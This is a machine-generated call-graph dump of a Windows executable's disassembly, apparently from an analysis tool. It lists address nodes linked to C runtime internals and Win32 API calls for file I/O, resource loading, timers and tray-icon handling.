94344->94345 94346 82a93a 94345->94346 94347 82a928 InitializeCriticalSectionAndSpinCount 94345->94347 94421 82a970 LeaveCriticalSection _doexit 94346->94421 94347->94346 94350 82b050 __ftell_nolock 94349->94350 94351 82b0ac 94350->94351 94352 82b08d 94350->94352 94383 82b082 94350->94383 94355 82b105 94351->94355 94356 82b0e9 94351->94356 94431 827bda 47 API calls __getptd_noexit 94352->94431 94360 82b11c 94355->94360 94437 82f82f 49 API calls 3 library calls 94355->94437 94434 827bda 47 API calls __getptd_noexit 94356->94434 94357 82b86b 94357->94336 94358 82b092 94432 827c0e 47 API calls __getptd_noexit 94358->94432 94422 833bf2 94360->94422 94362 82b0ee 94435 827c0e 47 API calls __getptd_noexit 94362->94435 94364 82b099 94433 826e10 8 API calls ___wstrgtold12_l 94364->94433 94368 82b12a 94369 82b44b 94368->94369 94438 827a0d 47 API calls 2 library calls 94368->94438 94371 82b463 94369->94371 94372 82b7b8 WriteFile 94369->94372 94370 82b0f5 94436 826e10 8 API calls ___wstrgtold12_l 94370->94436 94375 82b55a 94371->94375 94381 82b479 94371->94381 94376 82b7e1 GetLastError 94372->94376 94385 82b410 94372->94385 94387 82b565 94375->94387 94389 82b663 94375->94389 94376->94385 94377 82b150 GetConsoleMode 94377->94369 94379 82b189 94377->94379 94378 82b81b 94378->94383 94443 827c0e 47 API calls __getptd_noexit 94378->94443 94379->94369 94380 82b199 GetConsoleCP 94379->94380 94380->94385 94410 82b1c2 94380->94410 94381->94378 94382 82b4e9 WriteFile 94381->94382 94382->94376 94388 82b526 94382->94388 94445 82a70c 94383->94445 94385->94378 94385->94383 94386 82b7f7 94385->94386 94391 82b812 94386->94391 94392 82b7fe 94386->94392 94387->94378 94393 82b5de WriteFile 94387->94393 94388->94381 94388->94385 94399 82b555 94388->94399 94389->94378 94394 82b6d8 WideCharToMultiByte 94389->94394 94390 82b843 94444 827bda 47 API calls __getptd_noexit 94390->94444 94442 827bed 47 API calls 3 library calls 94391->94442 94440 827c0e 47 API calls __getptd_noexit 94392->94440 94393->94376 94398 82b62d 94393->94398 94394->94376 94405 82b71f 94394->94405 94398->94385 94398->94387 94398->94399 94399->94385 94400 82b803 94441 827bda 47 API calls __getptd_noexit 94400->94441 94401 82b727 WriteFile 94403 82b77a GetLastError 94401->94403 94401->94405 94403->94405 94405->94385 94405->94389 94405->94399 94405->94401 94406 8340f7 59 API calls __chsize_nolock 94406->94410 94407 82b28f WideCharToMultiByte 94407->94385 94409 82b2ca WriteFile 94407->94409 94408 82b2f6 94408->94376 94408->94385 94408->94410 94411 835884 WriteConsoleW CreateFileW __chsize_nolock 94408->94411 94412 82b321 WriteFile 94408->94412 94409->94376 94409->94408 94410->94385 94410->94406 94410->94407 94410->94408 94439 821688 57 API calls __isleadbyte_l 94410->94439 94411->94408 94412->94376 94412->94408 94413->94322 94414->94328 94415->94337 94416->94336 94417->94328 94418->94323 94419->94329 94420->94328 94421->94342 94423 833bfd 94422->94423 94424 833c0a 94422->94424 94425 827c0e ___wstrgtold12_l 47 API calls 94423->94425 94426 833c16 94424->94426 94427 827c0e ___wstrgtold12_l 47 API calls 94424->94427 94428 833c02 94425->94428 94426->94368 94429 833c37 94427->94429 94428->94368 94430 826e10 ___wstrgtold12_l 8 API calls 94429->94430 94430->94428 94431->94358 94432->94364 94433->94383 94434->94362 94435->94370 94436->94383 94437->94360 94438->94377 94439->94410 94440->94400 94441->94383 94442->94383 94443->94390 94444->94383 94446 82a716 IsProcessorFeaturePresent 94445->94446 94447 82a714 94445->94447 94449 8337b0 94446->94449 94447->94357 94450 83375f ___raise_securityfailure 5 API calls 94449->94450 94451 833893 94450->94451 94451->94357 94452->94287 94453->94289 94476 82aba4 94454->94476 94456 82eb00 94489 82ab1e 48 API calls 2 library calls 94456->94489 94458 82eaaa 94458->94456 94459 82eade 94458->94459 94462 82aba4 __lseek_nolock 47 API calls 94458->94462 94459->94456 94460 82aba4 __lseek_nolock 47 API calls 94459->94460 94463 82eaea CloseHandle 94460->94463 94461 82eb08 94464 82eb2a 94461->94464 94490 827bed 47 API calls 3 library calls 94461->94490 94465 82ead5 94462->94465 94463->94456 94466 82eaf6 GetLastError 94463->94466 94464->94311 94468 82aba4 __lseek_nolock 47 API calls 94465->94468 94466->94456 94468->94459 94469->94296 94470->94309 94471->94311 94472->94309 94473->94300 94474->94303 94475->94309 94477 82abc4 94476->94477 94478 82abaf 94476->94478 94482 82abe9 94477->94482 94493 827bda 47 API calls __getptd_noexit 94477->94493 94491 827bda 47 API calls __getptd_noexit 94478->94491 94481 82abb4 94492 827c0e 47 API calls __getptd_noexit 94481->94492 94482->94458 94483 82abf3 94494 827c0e 47 API calls __getptd_noexit 94483->94494 94486 82abbc 94486->94458 94487 82abfb 94495 826e10 8 API calls ___wstrgtold12_l 94487->94495 94489->94461 94490->94464 94491->94481 94492->94486 94493->94483 94494->94487 94495->94486 94497 809384 94496->94497 94514 809380 94496->94514 94498 874cbd __i64tow 94497->94498 94499 874bbf 94497->94499 94500 809398 94497->94500 94507 8093b0 __itow Mailbox _wcscpy 94497->94507 94501 874ca5 94499->94501 94502 874bc8 94499->94502 94602 82172b 80 API calls 3 library calls 94500->94602 94603 82172b 80 API calls 3 library calls 94501->94603 94502->94507 94508 874be7 94502->94508 94504 81f4ea 48 API calls 94506 8093ba 94504->94506 94510 80ce19 48 API calls 94506->94510 94506->94514 94507->94504 94509 81f4ea 48 API calls 94508->94509 94511 874c04 94509->94511 94510->94514 94512 81f4ea 48 API calls 94511->94512 94513 874c2a 94512->94513 94513->94514 94515 80ce19 48 API calls 94513->94515 94514->94136 94515->94514 94604 804214 94516->94604 94521 874f73 94524 804252 84 API calls 94521->94524 94522 8041d4 LoadLibraryExW 94614 804291 94522->94614 94526 874f7a 94524->94526 94528 804291 3 API calls 94526->94528 94530 874f82 94528->94530 94529 8041fb 94529->94530 94531 804207 94529->94531 94640 8044ed 94530->94640 94533 804252 84 API calls 94531->94533 94535 80420c 94533->94535 94535->94142 94535->94144 94537 874fa9 94648 804950 94537->94648 94823 821e46 94540->94823 94544 846918 _wcschr __ftell_nolock 94543->94544 94545 821dfc __wsplitpath 47 API calls 94544->94545 94548 84692e _wcscat _wcscpy 94544->94548 94546 84695d 94545->94546 94547 821dfc __wsplitpath 47 API calls 94546->94547 94547->94548 94548->94164 94550 84bfb1 __ftell_nolock 94549->94550 94551 81f4ea 48 API calls 94550->94551 94552 84c00e 94551->94552 94553 8047b7 48 API calls 94552->94553 94554 84c018 94553->94554 94555 84bdb4 GetSystemTimeAsFileTime 94554->94555 94556 84c023 94555->94556 94557 804517 83 API calls 94556->94557 94558 84c036 _wcscmp 94557->94558 94559 84c107 94558->94559 94560 84c05a 94558->94560 94561 84c56d 94 API calls 94559->94561 94866 84c56d 94560->94866 94577 84c0d3 _wcscat 94561->94577 94564 821dfc __wsplitpath 47 API calls 94569 84c088 _wcscat _wcscpy 94564->94569 94565 8044ed 64 API calls 94566 84c12c 94565->94566 94567 8044ed 64 API calls 94566->94567 94570 84c13c 94567->94570 94568 84c110 94568->94170 94572 821dfc __wsplitpath 47 API calls 94569->94572 94571 8044ed 64 API calls 94570->94571 94573 84c157 94571->94573 94572->94577 94574 8044ed 64 API calls 94573->94574 94575 84c167 94574->94575 94576 8044ed 64 API calls 94575->94576 94578 84c182 94576->94578 94577->94565 94577->94568 94579 8044ed 64 API calls 94578->94579 94580 84c192 94579->94580 94581 8044ed 64 API calls 94580->94581 94582 84c1a2 94581->94582 94583 8044ed 64 API calls 94582->94583 94584 84c1b2 94583->94584 94849 84c71a GetTempPathW GetTempFileNameW 94584->94849 94586 84c1be 94587 823499 117 API calls 94586->94587 94594 84c1cf 94587->94594 94588 84c289 94589 8235e4 __fcloseall 83 API calls 94588->94589 94590 84c294 94589->94590 94590->94568 94592 84c342 CopyFileW 94590->94592 94595 84c2b8 94590->94595 94591 8044ed 64 API calls 94591->94594 94592->94568 94593 84c32d 94592->94593 94593->94568 94863 84c6d9 CreateFileW 94593->94863 94594->94568 94594->94588 94594->94591 94850 822aae 94594->94850 94872 84b965 118 API calls __fcloseall 94595->94872 94599->94133 94600->94154 94601->94161 94602->94507 94603->94507 94653 804339 94604->94653 94607 80423c 94609 804244 FreeLibrary 94607->94609 94610 8041bb 94607->94610 94609->94610 94611 823499 94610->94611 94661 8234ae 94611->94661 94613 8041c8 94613->94521 94613->94522 94740 8042e4 94614->94740 94617 8042c1 FreeLibrary 94618 8041ec 94617->94618 94621 804380 94618->94621 94620 8042b8 94620->94617 94620->94618 94622 81f4ea 48 API calls 94621->94622 94623 804395 94622->94623 94748 8047b7 94623->94748 94625 8043a1 ___crtGetEnvironmentStringsW 94626 8043dc 94625->94626 94628 8044d1 94625->94628 94629 804499 94625->94629 94627 804950 57 API calls 94626->94627 94636 8043e5 94627->94636 94762 84c750 93 API calls 94628->94762 94751 80406b CreateStreamOnHGlobal 94629->94751 94632 8044ed 64 API calls 94632->94636 94634 804479 94634->94529 94635 874ed7 94637 804517 83 API calls 94635->94637 94636->94632 94636->94634 94636->94635 94757 804517 94636->94757 94638 874eeb 94637->94638 94639 8044ed 64 API calls 94638->94639 94639->94634 94641 874fc0 94640->94641 94642 8044ff 94640->94642 94780 82381e 94642->94780 94645 84bf5a 94800 84bdb4 94645->94800 94647 84bf70 94647->94537 94649 875002 94648->94649 94650 80495f 94648->94650 94805 823e65 94650->94805 94652 804967 94657 80434b 94653->94657 94656 804321 LoadLibraryA GetProcAddress 94656->94607 94658 80422f 94657->94658 94659 804354 LoadLibraryA 94657->94659 94658->94607 94658->94656 94659->94658 94660 804365 GetProcAddress 94659->94660 94660->94658 94662 8234ba __getstream 94661->94662 94663 8234cd 94662->94663 94665 8234fe 94662->94665 94709 827c0e 47 API calls __getptd_noexit 94663->94709 94680 82e4c8 94665->94680 94666 8234d2 94710 826e10 8 API calls ___wstrgtold12_l 94666->94710 94669 823503 94670 823519 94669->94670 94671 82350c 94669->94671 94673 823543 94670->94673 94674 823523 94670->94674 94711 827c0e 47 API calls __getptd_noexit 94671->94711 94694 82e5e0 94673->94694 94712 827c0e 47 API calls __getptd_noexit 94674->94712 94675 8234dd @_EH4_CallFilterFunc@8 __getstream 94675->94613 94681 82e4d4 __getstream 94680->94681 94682 827cf4 __lock 47 API calls 94681->94682 94692 82e4e2 94682->94692 94683 82e559 94719 8269d0 47 API calls __malloc_crt 94683->94719 94684 82e552 94714 82e5d7 94684->94714 94687 82e5cc __getstream 94687->94669 94688 82e560 94688->94684 94689 82e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 94688->94689 94689->94684 94690 827d7c __mtinitlocknum 47 API calls 94690->94692 94692->94683 94692->94684 94692->94690 94717 824e5b 48 API calls __lock 94692->94717 94718 824ec5 LeaveCriticalSection LeaveCriticalSection _doexit 94692->94718 94702 82e600 __wopenfile 94694->94702 94695 82e61a 94724 827c0e 47 API calls __getptd_noexit 94695->94724 94697 82e61f 94725 826e10 8 API calls ___wstrgtold12_l 94697->94725 94699 82e838 94721 8363c9 94699->94721 94700 82354e 94713 823570 LeaveCriticalSection LeaveCriticalSection _fprintf 94700->94713 94702->94695 94708 82e7d5 94702->94708 94726 82185b 59 API calls 2 library calls 94702->94726 94704 82e7ce 94704->94708 94727 82185b 59 API calls 2 library calls 94704->94727 94706 82e7ed 94706->94708 94728 82185b 59 API calls 2 library calls 94706->94728 94708->94695 94708->94699 94709->94666 94710->94675 94711->94675 94712->94675 94713->94675 94720 827e58 LeaveCriticalSection 94714->94720 94716 82e5de 94716->94687 94717->94692 94718->94692 94719->94688 94720->94716 94729 835bb1 94721->94729 94723 8363e2 94723->94700 94724->94697 94725->94700 94726->94704 94727->94706 94728->94708 94730 835bbd __getstream 94729->94730 94731 835bcf 94730->94731 94734 835c06 94730->94734 94732 827c0e ___wstrgtold12_l 47 API calls 94731->94732 94733 835bd4 94732->94733 94735 826e10 ___wstrgtold12_l 8 API calls 94733->94735 94736 835c78 __wsopen_helper 110 API calls 94734->94736 94739 835bde __getstream 94735->94739 94737 835c23 94736->94737 94738 835c4c __wsopen_helper LeaveCriticalSection 94737->94738 94738->94739 94739->94723 94744 8042f6 94740->94744 94743 8042cc LoadLibraryA GetProcAddress 94743->94620 94745 8042aa 94744->94745 94746 8042ff LoadLibraryA 94744->94746 94745->94620 94745->94743 94746->94745 94747 804310 GetProcAddress 94746->94747 94747->94745 94749 81f4ea 48 API calls 94748->94749 94750 8047c9 94749->94750 94750->94625 94752 804085 FindResourceExW 94751->94752 94756 8040a2 94751->94756 94753 874f16 LoadResource 94752->94753 94752->94756 94754 874f2b SizeofResource 94753->94754 94753->94756 94755 874f3f LockResource 94754->94755 94754->94756 94755->94756 94756->94626 94758 804526 94757->94758 94761 874fe0 94757->94761 94763 823a8d 94758->94763 94760 804534 94760->94636 94762->94626 94764 823a99 __getstream 94763->94764 94765 823aa7 94764->94765 94767 823acd 94764->94767 94776 827c0e 47 API calls __getptd_noexit 94765->94776 94769 824e1c __lock_file 48 API calls 94767->94769 94768 823aac 94777 826e10 8 API calls ___wstrgtold12_l 94768->94777 94771 823ad3 94769->94771 94778 8239fe 81 API calls 4 library calls 94771->94778 94773 823ae2 94779 823b04 LeaveCriticalSection LeaveCriticalSection _fprintf 94773->94779 94775 823ab7 __getstream 94775->94760 94776->94768 94777->94775 94778->94773 94779->94775 94783 823839 94780->94783 94782 804510 94782->94645 94784 823845 __getstream 94783->94784 94785 823888 94784->94785 94786 823880 __getstream 94784->94786 94788 82385b _memset 94784->94788 94787 824e1c __lock_file 48 API calls 94785->94787 94786->94782 94789 82388e 94787->94789 94796 827c0e 47 API calls __getptd_noexit 94788->94796 94798 82365b 62 API calls 6 library calls 94789->94798 94791 823875 94797 826e10 8 API calls ___wstrgtold12_l 94791->94797 94794 8238a4 94799 8238c2 LeaveCriticalSection LeaveCriticalSection _fprintf 94794->94799 94796->94791 94797->94786 94798->94794 94799->94786 94803 82344a GetSystemTimeAsFileTime 94800->94803 94802 84bdc3 94802->94647 94804 823478 __aulldiv 94803->94804 94804->94802 94806 823e71 __getstream 94805->94806 94807 823e94 94806->94807 94808 823e7f 94806->94808 94810 824e1c __lock_file 48 API calls 94807->94810 94819 827c0e 47 API calls __getptd_noexit 94808->94819 94812 823e9a 94810->94812 94811 823e84 94820 826e10 8 API calls ___wstrgtold12_l 94811->94820 94821 823b0c 55 API calls 4 library calls 94812->94821 94815 823ea5 94822 823ec5 LeaveCriticalSection LeaveCriticalSection _fprintf 94815->94822 94817 823eb7 94818 823e8f __getstream 94817->94818 94818->94652 94819->94811 94820->94818 94821->94815 94822->94817 94824 821e61 94823->94824 94825 821e55 94823->94825 94847 827c0e 47 API calls __getptd_noexit 94824->94847 94825->94824 94838 821ed4 94825->94838 94842 829d6b 47 API calls ___wstrgtold12_l 94825->94842 94827 822019 94831 821e41 94827->94831 94848 826e10 8 API calls ___wstrgtold12_l 94827->94848 94830 821fa0 94830->94824 94830->94831 94833 821fb0 94830->94833 94831->94156 94832 821f5f 94832->94824 94834 821f7b 94832->94834 94844 829d6b 47 API calls ___wstrgtold12_l 94832->94844 94846 829d6b 47 API calls ___wstrgtold12_l 94833->94846 94834->94824 94834->94831 94837 821f91 94834->94837 94845 829d6b 47 API calls ___wstrgtold12_l 94837->94845 94838->94824 94841 821f41 94838->94841 94843 829d6b 47 API calls ___wstrgtold12_l 94838->94843 94841->94830 94841->94832 94842->94838 94843->94841 94844->94834 94845->94831 94846->94831 94847->94827 94848->94831 94849->94586 94851 822aba __getstream 94850->94851 94852 822ae4 __getstream 94851->94852 94853 822ad4 94851->94853 94854 822aec 94851->94854 94852->94594 94885 827c0e 47 API calls __getptd_noexit 94853->94885 94856 824e1c __lock_file 48 API calls 94854->94856 94857 822af2 94856->94857 94873 822957 94857->94873 94858 822ad9 94886 826e10 8 API calls ___wstrgtold12_l 94858->94886 94864 84c715 94863->94864 94865 84c6ff SetFileTime CloseHandle 94863->94865 94864->94568 94865->94864 94869 84c581 __tzset_nolock _wcscmp 94866->94869 94867 84bf5a GetSystemTimeAsFileTime 94867->94869 94868 84c05f 94868->94564 94868->94568 94869->94867 94869->94868 94870 8044ed 64 API calls 94869->94870 94871 804517 83 API calls 94869->94871 94870->94869 94871->94869 94872->94593 94876 822966 94873->94876 94879 822984 94873->94879 94874 822974 94888 827c0e 47 API calls __getptd_noexit 94874->94888 94876->94874 94876->94879 94883 82299c ___crtGetEnvironmentStringsW 94876->94883 94877 822979 94889 826e10 8 API calls ___wstrgtold12_l 94877->94889 94887 822b24 LeaveCriticalSection LeaveCriticalSection _fprintf 94879->94887 94881 822c84 __flush 78 API calls 94881->94883 94882 822933 __fflush_nolock 47 API calls 94882->94883 94883->94879 94883->94881 94883->94882 94884 82af61 __flswbuf 78 API calls 94883->94884 94890 828e63 78 API calls 5 library calls 94883->94890 94884->94883 94885->94858 94886->94852 94887->94852 94888->94877 94889->94879 94890->94883 94920 806b0f 94891->94920 94893 80b69b 94932 80ba85 48 API calls ___crtGetEnvironmentStringsW 94893->94932 94895 80b6b5 Mailbox 94895->94176 94898 87397b 94939 8426bc 88 API calls 4 library calls 94898->94939 94899 80ba85 48 API calls 94912 80b495 94899->94912 94902 80b9e4 94941 8426bc 88 API calls 4 library calls 94902->94941 94903 873973 94903->94895 94906 80bcce 48 API calls 94906->94912 94907 873989 94940 80ba85 48 API calls ___crtGetEnvironmentStringsW 94907->94940 94909 873909 94935 806b4a 94909->94935 94912->94893 94912->94898 94912->94899 94912->94902 94912->94906 94912->94909 94915 80bdfa 48 API calls 94912->94915 94918 873939 ___crtGetEnvironmentStringsW 94912->94918 94925 80c413 59 API calls 94912->94925 94926 80bb85 94912->94926 94931 80bc74 48 API calls 94912->94931 94933 80c6a5 49 API calls 94912->94933 94934 80c799 48 API calls ___crtGetEnvironmentStringsW 94912->94934 94914 873914 94917 81f4ea 48 API calls 94914->94917 94916 80b66c CharUpperBuffW 94915->94916 94916->94912 94917->94918 94938 8426bc 88 API calls 4 library calls 94918->94938 94919->94180 94921 81f4ea 48 API calls 94920->94921 94922 806b34 94921->94922 94923 806b4a 48 API calls 94922->94923 94924 806b43 94923->94924 94924->94912 94925->94912 94927 80bb9b 94926->94927 94930 80bb96 ___crtGetEnvironmentStringsW 94926->94930 94928 81ee75 48 API calls 94927->94928 94929 871b77 94927->94929 94928->94930 94930->94912 94931->94912 94932->94895 94933->94912 94934->94912 94936 81f4ea 48 API calls 94935->94936 94937 806b54 94936->94937 94937->94914 94938->94903 94939->94907 94940->94903 94941->94903 94943 846529 94942->94943 94944 846cc4 FindFirstFileW 94942->94944 94943->94000 94944->94943 94945 846cd9 FindClose 94944->94945 94945->94943 94947 811d2a 94946->94947 94951 811ed6 94946->94951 94948 812357 94947->94948 94947->94951 94952 811e0b 94947->94952 94953 811eba 94947->94953 94948->94953 94969 849f44 58 API calls wcstoxq 94948->94969 94949 811f55 94949->94953 94957 811e9a Mailbox 94949->94957 94967 8397ed InterlockedDecrement 94949->94967 94951->94948 94951->94949 94951->94953 94951->94957 94952->94949 94952->94953 94954 811e47 94952->94954 94953->94064 94954->94953 94956 87bfc4 94954->94956 94954->94957 94966 82203b 58 API calls __wtof_l 94956->94966 94957->94953 94968 82203b 58 API calls __wtof_l 94957->94968 94960->94064 94961->94065 94962->94065 94963->94058 94964->94052 94965->94066 94966->94953 94967->94957 94968->94953 94969->94953 94970->93892 94971->93892 94972->93886 94973->93901 94974->93905 94975 803742 94976 80374b 94975->94976 94977 8037c8 94976->94977 94978 803769 94976->94978 95016 8037c6 94976->95016 94980 871e00 94977->94980 94981 8037ce 94977->94981 94982 803776 94978->94982 94983 80382c PostQuitMessage 94978->94983 94979 8037ab DefWindowProcW 95005 8037b9 94979->95005 95030 802ff6 16 API calls 94980->95030 94984 8037d3 94981->94984 94985 8037f6 SetTimer RegisterWindowMessageW 94981->94985 94987 803781 94982->94987 94988 871e88 94982->94988 94983->95005 94993 871da3 94984->94993 94994 8037da KillTimer 94984->94994 94989 80381f CreatePopupMenu 94985->94989 94985->95005 94990 803836 94987->94990 94991 803789 94987->94991 95045 844ddd 60 API calls _memset 94988->95045 94989->95005 95020 81eb83 94990->95020 94997 803794 94991->94997 95009 871e6d 94991->95009 94999 871ddc MoveWindow 94993->94999 95000 871da8 94993->95000 95027 803847 Shell_NotifyIconW _memset 94994->95027 94995 871e27 95031 81e312 331 API calls Mailbox 94995->95031 95002 871e58 94997->95002 95003 80379f 94997->95003 94999->95005 95006 871dac 95000->95006 95007 871dcb SetFocus 95000->95007 95043 8455bd 70 API calls _memset 95002->95043 95003->94979 95032 803847 Shell_NotifyIconW _memset 95003->95032 95004 871e9a 95004->94979 95004->95005 95006->95003 95010 871db5 95006->95010 95007->95005 95008 8037ed 95028 80390f DeleteObject DestroyWindow Mailbox 95008->95028 95009->94979 95044 83a5f3 48 API calls 95009->95044 95029 802ff6 16 API calls 95010->95029 95015 871e68 95015->95005 95016->94979 95018 871e4c 95033 804ffc 95018->95033 95021 81eb9a _memset 95020->95021 95022 81ec1c 95020->95022 95046 8051af 95021->95046 95022->95005 95024 81ec05 KillTimer SetTimer 95024->95022 95025 873c7a Shell_NotifyIconW 95025->95024 95026 81ebc1 95026->95024 95026->95025 95027->95008 95028->95005 95029->95005 95030->94995 95031->95003 95032->95018 95034 805027 _memset 95033->95034 95123 804c30 95034->95123 95038 8050ca Shell_NotifyIconW 95040 8051af 50 API calls 95038->95040 95039 873d28 Shell_NotifyIconW 95041 8050df 95040->95041 95041->95016 95042 8050ac 95042->95038 95042->95039 95043->95015 95044->95016 95045->95004 95047 8051cb 95046->95047 95067 8052a2 Mailbox 95046->95067 95048 806b0f 48 API calls 95047->95048 95049 8051d9 95048->95049 95050 873ca1 LoadStringW 95049->95050 95051 8051e6 95049->95051 95054 873cbb 95050->95054 95068 806a63 95051->95068 95053 8051fb 95053->95054 95055 80520c 95053->95055 95056 80510d 48 API calls 95054->95056 95057 805216 95055->95057 95058 8052a7 95055->95058 95061 873cc5 95056->95061 95079 80510d 95057->95079 95059 806eed 48 API calls 95058->95059 95064 805220 _memset _wcscpy 95059->95064 95061->95064 95088 80518c 95061->95088 95063 873ce7 95065 80518c 48 API calls 95063->95065 95066 805288 Shell_NotifyIconW 95064->95066 95065->95064 95066->95067 95067->95026 95069 806adf 95068->95069 95072 806a6f __NMSG_WRITE 95068->95072 95099 80b18b 95069->95099 95071 806ab6 ___crtGetEnvironmentStringsW 95071->95053 95073 806ad7 95072->95073 95074 806a8b 95072->95074 95098 80c369 48 API calls 95073->95098 95076 806b4a 48 API calls 95074->95076 95077 806a95 95076->95077 95078 81ee75 48 API calls 95077->95078 95078->95071 95080 871be7 95079->95080 95081 80511f 95079->95081 95112 83a58f 48 API calls ___crtGetEnvironmentStringsW 95080->95112 95103 80b384 95081->95103 95084 871bf1 95086 806eed 48 API calls 95084->95086 95085 80512b 95085->95064 95087 871bf9 Mailbox 95086->95087 95089 805197 95088->95089 95090 871ace 95089->95090 95091 80519f 95089->95091 95092 806b4a 48 API calls 95090->95092 95113 805130 95091->95113 95094 871adb __NMSG_WRITE 95092->95094 95096 81ee75 48 API calls 95094->95096 95095 8051aa 95095->95063 95097 871b07 ___crtGetEnvironmentStringsW 95096->95097 95098->95071 95100 80b1a2 ___crtGetEnvironmentStringsW 95099->95100 95101 80b199 95099->95101 95100->95071 95101->95100 95102 80bdfa 48 API calls 95101->95102 95102->95100 95104 80b3c5 ___crtGetEnvironmentStringsW 95103->95104 95105 80b392 95103->95105 95104->95085 95104->95104 95105->95104 95106 80b3b8 95105->95106 95107 80b3fd 95105->95107 95109 80bb85 48 API calls 95106->95109 95108 81f4ea 48 API calls 95107->95108 95110 80b407 95108->95110 95109->95104 95111 81f4ea 48 API calls 95110->95111 95111->95104 95112->95084 95114 80513f __NMSG_WRITE 95113->95114 95115 871b27 95114->95115 95116 805151 95114->95116 95117 806b4a 48 API calls 95115->95117 95118 80bb85 48 API calls 95116->95118 95120 871b34 95117->95120 95119 80515e ___crtGetEnvironmentStringsW 95118->95119 95119->95095 95121 81ee75 48 API calls 95120->95121 95122 871b57 ___crtGetEnvironmentStringsW 95121->95122 95124 873c33 95123->95124 95125 804c44 95123->95125 95124->95125 95126 873c3c DestroyIcon 95124->95126 95125->95042 95127 845819 61 API calls _W_store_winword 95125->95127 95126->95125 95127->95042 95128 8719dd 95133 804a30 95128->95133 95130 8719f1 95153 820f0a 52 API calls __cinit 95130->95153 95132 8719fb 95134 804a40 __ftell_nolock 95133->95134 95135 80d7f7 48 API calls 95134->95135 95136 804af6 95135->95136 95154 805374 95136->95154 95138 804aff 95161 80363c 95138->95161 95141 80518c 48 API calls 95142 804b18 95141->95142 95167 8064cf 95142->95167 95145 80d7f7 48 API calls 95146 804b32 95145->95146 95173 8049fb 95146->95173 95148 804b43 Mailbox 95148->95130 95149 8061a6 48 API calls 95152 804b3d _wcscat Mailbox __NMSG_WRITE 95149->95152 95150 80ce19 48 API calls 95150->95152 95151 8064cf 48 API calls 95151->95152 95152->95148 95152->95149 95152->95150 95152->95151 95153->95132 95187 82f8a0 95154->95187 95157 80ce19 48 API calls 95158 8053a7 95157->95158 95189 80660f 95158->95189 95160 8053b1 Mailbox 95160->95138 95162 803649 __ftell_nolock 95161->95162 95200 80366c GetFullPathNameW 95162->95200 95164 80365a 95165 806a63 48 API calls 95164->95165 95166 803669 95165->95166 95166->95141 95168 80651b 95167->95168 95172 8064dd ___crtGetEnvironmentStringsW 95167->95172 95171 81f4ea 48 API calls 95168->95171 95169 81f4ea 48 API calls 95170 804b29 95169->95170 95170->95145 95171->95172 95172->95169 95202 80bcce 95173->95202 95176 8741cc RegQueryValueExW 95178 874246 RegCloseKey 95176->95178 95179 8741e5 95176->95179 95177 804a2b 95177->95152 95180 81f4ea 48 API calls 95179->95180 95181 8741fe 95180->95181 95182 8047b7 48 API calls 95181->95182 95183 874208 RegQueryValueExW 95182->95183 95184 874224 95183->95184 95185 87423b 95183->95185 95186 806a63 48 API calls 95184->95186 95185->95178 95186->95185 95188 805381 GetModuleFileNameW 95187->95188 95188->95157 95190 82f8a0 __ftell_nolock 95189->95190 95191 80661c GetFullPathNameW 95190->95191 95192 806a63 48 API calls 95191->95192 95193 806643 95192->95193 95196 806571 95193->95196 95197 80657f 95196->95197 95198 80b18b 48 API calls 95197->95198 95199 80658f 95198->95199 95199->95160 95201 80368a 95200->95201 95201->95164 95203 80bce8 95202->95203 95207 804a0a RegOpenKeyExW 95202->95207 95204 81f4ea 48 API calls 95203->95204 95205 80bcf2 95204->95205 95206 81ee75 48 API calls 95205->95206 95206->95207 95207->95176 95207->95177 95208 81221a 95209 81271e 95208->95209 95210 812223 95208->95210 95218 811eba Mailbox 95209->95218 95219 83a58f 48 API calls ___crtGetEnvironmentStringsW 95209->95219 95210->95209 95211 80936c 81 API calls 95210->95211 95212 81224e 95211->95212 95212->95209 95213 81225e 95212->95213 95215 80b384 48 API calls 95213->95215 95215->95218 95216 87be8a 95217 806eed 48 API calls 95216->95217 95217->95218 95219->95216 95220 879bec 95225 810ae0 Mailbox ___crtGetEnvironmentStringsW 95220->95225 95221 80ffe1 Mailbox 95223 81f4ea 48 API calls 95223->95225 95224 811526 Mailbox 95276 84cc5c 86 API calls 4 library calls 95224->95276 95225->95221 95225->95223 95225->95224 95247 80ce19 48 API calls 95225->95247 95250 80fec8 95225->95250 95256 80fe30 331 API calls 95225->95256 95257 87a706 95225->95257 95259 8397ed InterlockedDecrement 95225->95259 95260 856ff0 331 API calls 95225->95260 95263 860d1d 95225->95263 95266 860d09 95225->95266 95270 85ef61 82 API calls 2 library calls 95225->95270 95271 85f0ac 90 API calls Mailbox 95225->95271 95272 84a6ef 48 API calls 95225->95272 95273 85e822 331 API calls Mailbox 95225->95273 95228 81f4ea 48 API calls 95228->95250 95230 811d10 59 API calls 95230->95250 95232 806eed 48 API calls 95232->95250 95233 81146e 95239 806eed 48 API calls 95233->95239 95234 810509 95279 84cc5c 86 API calls 4 library calls 95234->95279 95235 87a922 95236 811473 95278 84cc5c 86 API calls 4 library calls 95236->95278 95237 87a246 95241 806eed 48 API calls 95237->95241 95239->95221 95241->95221 95243 8397ed InterlockedDecrement 95243->95250 95244 87a873 95245 87a30e 95245->95221 95274 8397ed InterlockedDecrement 95245->95274 95246 80d7f7 48 API calls 95246->95250 95247->95225 95249 87a973 95280 84cc5c 86 API calls 4 library calls 95249->95280 95250->95221 95250->95228 95250->95230 95250->95232 95250->95233 95250->95234 95250->95236 95250->95237 95250->95243 95250->95245 95250->95246 95250->95249 95251 820f0a 52 API calls __cinit 95250->95251 95255 8115b5 95250->95255 95269 811820 331 API calls 2 library calls 95250->95269 95251->95250 95253 87a982 95277 84cc5c 86 API calls 4 library calls 95255->95277 95256->95225 95275 84cc5c 86 API calls 4 library calls 95257->95275 95259->95225 95260->95225 95281 85f8ae 95263->95281 95265 860d2d 95265->95225 95267 85f8ae 129 API calls 95266->95267 95268 860d19 95267->95268 95268->95225 95269->95250 95270->95225 95271->95225 95272->95225 95273->95225 95274->95221 95275->95224 95276->95221 95277->95221 95278->95244 95279->95235 95280->95253 95282 80936c 81 API calls 95281->95282 95283 85f8ea 95282->95283 95308 85f92c Mailbox 95283->95308 95317 860567 95283->95317 95285 85fb8b 95286 85fcfa 95285->95286 95290 85fb95 95285->95290 95364 860688 89 API calls Mailbox 95286->95364 95289 85fd07 95289->95290 95291 85fd13 95289->95291 95330 85f70a 95290->95330 95291->95308 95292 80936c 81 API calls 95310 85f984 Mailbox 95292->95310 95297 85fbc9 95344 81ed18 95297->95344 95300 85fbe3 95350 84cc5c 86 API calls 4 library calls 95300->95350 95301 85fbfd 95351 81c050 